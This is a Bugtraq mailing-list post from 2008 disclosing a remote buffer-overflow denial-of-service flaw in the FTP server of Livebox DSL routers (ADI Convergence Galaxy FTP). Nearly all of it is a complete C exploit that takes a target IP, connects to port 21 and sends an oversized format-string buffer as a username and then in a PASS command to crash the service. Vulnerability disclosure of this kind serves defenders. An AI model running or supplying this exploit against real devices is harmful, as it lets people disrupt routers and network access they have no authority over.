Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS (FTPD)_

From: 0in.email () gmail com
Date: 1 Mar 2008 21:31:07 -0000
Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS

Discovered by: 0in from DaRk-CodeRs Security & Programming Group!
http://dark-coders.4rh.eu

DESCRIPTION:
Livebox (tested on polish "Neostrada TP Livebox") is vulnerability to remote (but from local network, because firewall 
working..) buffer overflow DoS attack to FTP service.
FULL FTP SERVER NAME:"ADI Convergence Galaxy FTP server v0.1".

POC: 

#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#include <stdio.h> 
#include <unistd.h> 
#include <string.h> 

int port=21; 
struct hostent *he; 
struct sockaddr_in their_addr; 



int konekt(char *addr) 
{ 
  int sock; 

  he=gethostbyname(addr); 
  if(he==NULL) 
  { 
    printf("Unknow host!\nexiting..."); 
    return -1; 
  } 
  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) 
  { 
    perror("socket"); 
    return -2; 
  } 

  their_addr.sin_family = AF_INET;    
  their_addr.sin_port = htons(port);  
  their_addr.sin_addr = *((struct in_addr *)he->h_addr); 
  memset(&(their_addr.sin_zero), '\0', 8); 
  if (connect(sock, (struct sockaddr *)&their_addr, 
      sizeof(struct sockaddr)) == -1) 
  { 
    perror("connect"); 
    return -1; 
  } 

  return sock; 
} 

int main(int argc,char *argv[])
{
        printf("\n+===============================Yeah======================================+");
        printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+");
        printf("\n+=               Remote Buffer Overflow DoS Exploit                      =+");
        printf("\n+=                              bY                                       =+");
        printf("\n+=        Maks M. [0in] From Dark-CodeRs Security & Programming Group!   =+");
        printf("\n+=                    0in(dot)email[at]gmail(dot)com                     =+");
        printf("\n+=               Please visit: http://dark-coders.4rh.eu                 =+");
        printf("\n+=      Greetings to: Die_Angel, Sun8hclf, M4r1usz, Aristo89, Djlinux    =+");
        printf("\n+=                    MaLy, Slim, elwin013, Rade0n3900, Wojto111,        =+");
        printf("\n+=                    Chomzee, AfroPL, Joker186                          =+");
        printf("\n+===============================Yeah======================================+");

        if(argc<2)
        {
                printf("\nUse %s [IP]!\n",argv[0]);
                exit(0);
        }
        printf("\nConnecting to:%s...",argv[1]);
int sock=konekt(argv[1]);
if(sock<0)
{
        printf("\neh...");
        exit(0);
}
printf("\nConnected!!\n");
char rcv[256];
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
printf("\nSending evil buffer..");
char evil[100*100]="%n\x01\x02\x03\x04";
int i;
for(i=0;i<(100*100)-100;i++)
{
        strcat(evil,"A");
}

strcat(evil,"\r\n");
send(sock,evil,strlen(evil),0);
strcpy(rcv,"");
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
char pass[100*1000]="PASS ";
strcat(pass,evil);
strcat(pass,"\n\r");
send(sock,pass,strlen(pass),0);
strcpy(rcv,"");
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
printf("\nOK!\nYou're Livebox FTP server should fu**ed out...");

exit(0);
}

EOF.
Previous By Date Next
Previous By Thread Next

Current thread: